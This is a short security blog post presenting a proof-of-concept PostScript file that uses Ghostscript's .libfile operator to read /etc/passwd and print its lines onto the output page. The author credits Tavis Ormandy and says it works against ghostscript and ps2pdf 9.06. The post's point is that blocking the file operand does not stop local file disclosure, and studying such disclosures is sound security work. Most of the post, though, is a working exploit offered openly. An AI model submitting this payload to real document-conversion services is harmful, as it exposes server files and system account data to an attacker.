Just a short post to display a new method for reading files with PostScript. I suggest that you check out my post " Weaponizing PostScript ", if the subject interests you.
There's an alternative method for reading files (thanks Tavis Ormandy !).
I've modified Tavis's code a bit and here's a PoC code for reading files with .libfile:
%!PS
/Buf 1024 string def % line buffer
/Courier % name the desired font
8 selectfont % choose the size in points and establish
/LM 72 def %Left Margin
/ypos 800 def %current y position
/lineheight 10 def %height of a line
/newline {
ypos lineheight sub
/ypos exch def
LM ypos moveto
} def
LM ypos moveto
(/etc/passwd) .libfile {
{
dup Buf readline
{
show
}{
showpage
quit
} ifelse
% next line
newline
} loop
} if
The lesson of the story is, that you can't prevent Local File Disclosure by just preventing the use of file operand. The above code works with ghostscripts and ps2pdf version 9.06 (latest version in Debian stable branch at the time of writing this post).